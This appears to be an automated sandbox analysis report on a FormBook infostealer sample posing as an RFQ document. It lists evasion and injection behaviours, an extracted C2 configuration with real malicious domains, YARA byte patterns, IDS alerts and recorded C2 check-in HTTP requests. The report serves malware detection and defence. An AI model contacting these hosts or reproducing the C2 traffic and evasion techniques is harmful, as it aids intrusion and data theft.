
Windows Analysis Report
MKCC-MEC-RFQ-115-2024.exe

Overview

General Information

Sample name: MKCC-MEC-RFQ-115-2024.exe
Analysis ID: 1467059
MD5: 11ab7d8a50ccafbb4d7b5c9e83e4ff4c
SHA1: 1e0d2f0564e8a8dc7237c98e3facc0e1b4b314cf
SHA256: 2eb137991ea1e48556d906d1e03bfaed1df13529dd2420031e6fc92b55c076d1
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • MKCC-MEC-RFQ-115-2024.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe" MD5: 11AB7D8A50CCAFBB4D7B5C9E83E4FF4C)
    • svchost.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • systray.exe (PID: 7800 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • cmd.exe (PID: 7864 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware configuration (FormBook): {"C2 list": ["www.gb-electric-wheelchairs-8j.bond/ts59/"], "decoy": ["hgptgz684w.top", "gas39.pro", "totalcow.com", "76466.club", "ssweatstudio.com", "nr35.top", "hmstr-drop.site", "kjsdhklssk13.xyz", "lostaino.com", "athenamotel.info", "9332946.com", "ec-delivery-jobs-8j.bond", "complaix.com", "824go.com", "checkout4xgrow.shop", "modleavedepts.online", "shoedio54.com", "topallinoneaccounting.com", "texhio.online", "cn-brand.com", "spotlights-instagram.com", "kgstrengthandperformance.com", "illumonos.com", "asmauardotreschicshoes.com", "732456.app", "uorder.xyz", "scarytube.world", "ujgddhhfeffsfgg2.group", "slumbergrip.com", "anugerahcorp.biz", "genevieveeventrental.com", "wizardatm.com", "pipelin.xyz", "zangbreaker.com", "782akd.top", "theurbangarden.xyz", "relatablemedia.net", "robottts.com", "femininequantumflowcoach.com", "thebeckettfamily.com", "yys1.rest", "f-kd.net", "ycmg5352.com", "babyscan.xyz", "superprinterworld.com", "decorland.online", "anatomiasiedzenia.com", "digitalanju.life", "zu89.top", "dropfile.xyz", "00050516.xyz", "kris1.com", "riedmw.sbs", "osofamilycoffee.com", "redseadivingadventure.com", "momura.xyz", "bvlazaedi.xyz", "vifjzpdi.xyz", "digitalimageryde.shop", "anjay4d.green", "qjjkxi260l.top", "granadaiighting.com", "agenciademarketingtorreon.com", "casinomaxnodepositbonus.icu"]}
Source | Rule | Description | Author | Strings
00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.svchost.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.svchost.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a39:$sqlite3step: 68 34 1C 7B E1
  • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a68:$sqlite3text: 68 38 2A 90 C5
  • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C

          System Summary

          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", CommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", ParentImage: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe, ParentProcessId: 7720, ParentProcessName: MKCC-MEC-RFQ-115-2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", ProcessId: 7752, ProcessName: svchost.exe
          Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", CommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", ParentImage: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe, ParentProcessId: 7720, ParentProcessName: MKCC-MEC-RFQ-115-2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", ProcessId: 7752, ProcessName: svchost.exe
          Snort IDS alerts:
          Timestamp: 07/03/24-17:27:15.447591 | SID: 2031412 | Source Port: 49715 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-17:28:17.173810 | SID: 2031412 | Source Port: 49717 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-17:26:54.930423 | SID: 2031412 | Source Port: 49714 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-17:29:39.440629 | SID: 2031412 | Source Port: 49720 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-17:26:15.356501 | SID: 2031412 | Source Port: 49711 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-17:28:37.873542 | SID: 2031412 | Source Port: 49718 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-17:25:55.097431 | SID: 2031412 | Source Port: 49709 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-17:27:36.550599 | SID: 2031412 | Source Port: 49716 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 07/03/24-17:29:18.833017 | SID: 2031412 | Source Port: 49719 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected



          AV Detection

          Source: http://www.texhio.online/ts59/www.ec-delivery-jobs-8j.bond | Avira URL Cloud: Label: malware
          Source: http://www.zu89.top/ts59/ | Avira URL Cloud: Label: malware
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.gb-electric-wheelchairs-8j.bond/ts59/"], "decoy": ["hgptgz684w.top", "gas39.pro", "totalcow.com", "76466.club", "ssweatstudio.com", "nr35.top", "hmstr-drop.site", "kjsdhklssk13.xyz", "lostaino.com", "athenamotel.info", "9332946.com", "ec-delivery-jobs-8j.bond", "complaix.com", "824go.com", "checkout4xgrow.shop", "modleavedepts.online", "shoedio54.com", "topallinoneaccounting.com", "texhio.online", "cn-brand.com", "spotlights-instagram.com", "kgstrengthandperformance.com", "illumonos.com", "asmauardotreschicshoes.com", "732456.app", "uorder.xyz", "scarytube.world", "ujgddhhfeffsfgg2.group", "slumbergrip.com", "anugerahcorp.biz", "genevieveeventrental.com", "wizardatm.com", "pipelin.xyz", "zangbreaker.com", "782akd.top", "theurbangarden.xyz", "relatablemedia.net", "robottts.com", "femininequantumflowcoach.com", "thebeckettfamily.com", "yys1.rest", "f-kd.net", "ycmg5352.com", "babyscan.xyz", "superprinterworld.com", "decorland.online", "anatomiasiedzenia.com", "digitalanju.life", "zu89.top", "dropfile.xyz", "00050516.xyz", "kris1.com", "riedmw.sbs", "osofamilycoffee.com", "redseadivingadventure.com", "momura.xyz", "bvlazaedi.xyz", "vifjzpdi.xyz", "digitalimageryde.shop", "anjay4d.green", "qjjkxi260l.top", "granadaiighting.com", "agenciademarketingtorreon.com", "casinomaxnodepositbonus.icu"]}
          Source: MKCC-MEC-RFQ-115-2024.exe | ReversingLabs: Detection: 39%
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
          Source: MKCC-MEC-RFQ-115-2024.exe | Joe Sandbox ML: detected
          Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: systray.pdb source: svchost.exe, 00000002.00000002.1480103834.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480125938.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1479720964.0000000000640000.00000040.10000000.00040000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.3875792331.0000000000670000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: svchost.exe, 00000002.00000002.1480103834.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480125938.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1479720964.0000000000640000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3875792331.0000000000670000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1425683480.0000000003790000.00000004.00001000.00020000.00000000.sdmp, MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427596238.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1429323514.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432752916.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.000000000319E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1480176048.000000000496E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1481840987.0000000004B61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1425683480.0000000003790000.00000004.00001000.00020000.00000000.sdmp, MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427596238.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1429323514.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432752916.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.000000000319E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.3876726949.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1480176048.000000000496E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1481840987.0000000004B61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3887605921.000000001048F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000525F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3876115690.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3887605921.000000001048F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000525F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3876115690.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00144696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00144696
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014C93C FindFirstFileW,FindClose,1_2_0014C93C
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0014C9C7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0014F200
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0014F35D
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0014F65E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00143A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00143A2B
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00143D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00143D4E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0014BF27
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop esi 2_2_00417295
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop esi 2_2_0041730F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop ebx 2_2_00407B1A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi 2_2_0040E43A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi 2_2_00416CDB
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop esi 4_2_02E67295
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop esi 4_2_02E6730F
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi 4_2_02E5E43A
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop ebx 4_2_02E57B1B
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi 4_2_02E66CDB

          Networking

          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49709 -> 188.114.97.3:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49711 -> 76.223.105.230:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49714 -> 3.64.163.50:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49715 -> 185.53.179.91:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49716 -> 194.41.37.158:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49717 -> 104.194.9.178:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49718 -> 89.106.200.1:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49719 -> 65.21.196.90:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49720 -> 188.114.96.3:80
          Source: C:\Windows\explorer.exe | Network Connect: 76.223.105.230 80
          Source: C:\Windows\explorer.exe | Network Connect: 188.114.97.3 80
          Source: Malware configuration extractor | URLs: www.gb-electric-wheelchairs-8j.bond/ts59/
          Source: DNS query: www.bvlazaedi.xyz
          Source: DNS query: www.babyscan.xyz
          Source: DNS query: www.momura.xyz
          Source: DNS query: www.00050516.xyz
          Source: global traffic | HTTP traffic detected: GET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX HTTP/1.1 | Host: www.checkout4xgrow.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BP HTTP/1.1 | Host: www.kgstrengthandperformance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ts59/?Upql=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhpqi9CeNRWR+i&S0GhCH=DR-Lh8FH5BP HTTP/1.1 | Host: www.babyscan.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQ HTTP/1.1 | Host: www.gb-electric-wheelchairs-8j.bond | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ts59/?Upql=eOJ5wRfCg8ODtwLT+RxU2vRwj/ifTX9ZHMiqr0Mmp4jM1anHRZ8cLTgQ01aLoU+CLIq0&S0GhCH=DR-Lh8FH5BP HTTP/1.1 | Host: www.76466.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 185.53.179.91
          Source: Joe Sandbox View | IP Address: 188.114.97.3
          Source: Joe Sandbox View | IP Address: 188.114.97.3
          Source: Joe Sandbox View | ASN Name: SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK
          Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE
          Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View | ASN Name: AMAZON-02US
          Source: Joe Sandbox View | ASN Name: AMAZON-02US
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001525E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_001525E2
          Source: global traffic | DNS traffic detected: DNS query: www.checkout4xgrow.shop
          Source: global traffic | DNS traffic detected: DNS query: www.kgstrengthandperformance.com
          Source: global traffic | DNS traffic detected: DNS query: www.bvlazaedi.xyz
          Source: global traffic | DNS traffic detected: DNS query: www.babyscan.xyz
          Source: global traffic | DNS traffic detected: DNS query: www.gb-electric-wheelchairs-8j.bond
          Source: global traffic | DNS traffic detected: DNS query: www.76466.club
          Source: global traffic | DNS traffic detected: DNS query: www.ujgddhhfeffsfgg2.group
          Source: global traffic | DNS traffic detected: DNS query: www.modleavedepts.online
          Source: global traffic | DNS traffic detected: DNS query: www.momura.xyz
          Source: global traffic | DNS traffic detected: DNS query: www.gas39.pro
          Source: global traffic | DNS traffic detected: DNS query: www.00050516.xyz
          Source: global traffic | DNS traffic detected: DNS query: www.topallinoneaccounting.com
          Source: explorer.exe, 00000003.00000000.1438602211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000000.1438602211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
